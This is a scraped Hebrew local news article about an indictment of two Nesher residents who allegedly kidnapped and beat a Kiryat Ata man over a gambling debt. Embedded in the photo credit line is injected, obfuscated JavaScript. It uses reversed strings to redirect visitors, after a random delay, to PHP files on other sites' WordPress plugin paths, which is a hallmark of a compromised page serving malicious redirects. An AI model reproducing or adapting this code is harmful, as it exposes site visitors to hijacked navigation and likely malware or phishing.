fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

אישום נגד 2 תושבי נשר: חטפו תושב קרית אתא

מכתב האישום עולה כי השניים לקחו את הקורבן לבית עסק בנשר, שם החזיקו בו מספר שעות והיכו אותו עד שנזקק לטיפול הרפואי. הרקע: חוב כספי
אלימות
צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

המשטרה עצרה שני תושבי נשר בחשד שחטפו את תושב קרית אתא ותקפו אותו על רקע סכסוך כספי ביניהם. הבוקר הוגש נגד השניים כתב אישום לבית המשפט המחוזי בחיפה.

מכתב האישום עולה, כי בלילה שבין 4 ל-5 בנובמבר הגיעו שני הנאשמים , דרור דוידוב וירין אלמליח, תושבי נשר, בגילאי 33 ו-39, סמוך לביתו של תושב קרית אתא, 34, ולקחו אותו לבית עסק בנשר השייך לאחד מהם. הם תפסו אותו בעת שנסע במכוניתו כשהרקע למעשה הוא חוב של כ-600 אלף שקלים עקב הימורים.

הקורבן הוחזק במתקן לשטיפת מכוניות ששייך לאלמלח ולאחר שניתקו את מצלמות האבטחה הם היכו אותו קשות וגרמו לו לשבר בידו.  במשך מספר שעות שהה החטוף במקום תוך שהוא מותקף באלימות קשה עד שנזקק לטיפול רפואי בבית החולים רמב"ם. הקורבן שוחרר לביתו רק לאחר שקרובי משפחתו הגיעו למקום והתחייבו על החזרת החוב.

כעבור שבועיים, לאחר חקירה סמויה, שנפתחה ביחידה המרכזית במחוז חוף של משטרת ישראל, נעצרו שני הנאשמים, המיוצגים על ידי עו"ד תומר נוה ועו"ד שלומי שרון, והבוקר (שני) הגישה נגדם פרקליטות מחוז חיפה כתב אישום בעבירות של חטיפה לשם סחיטה, סחיטה בכוח ועבירות נוספות.

מהמשטרה נמסר, כי היא תמשיך להפעיל מגוון אמצעים ויכולות מבצעיות ומודיעיניות, במטרה להילחם בתופעות פשיעה חמורות, על מנת לאפשר שגרת חיים תקינה ובטוחה לאזרחים שומרי החוק ולמצות את הדין עם מבצעי העבירה.

אהבתם? שתפו!

תגיות

אולי גם יעניין אותך

שיתוף ברשתות החברתיות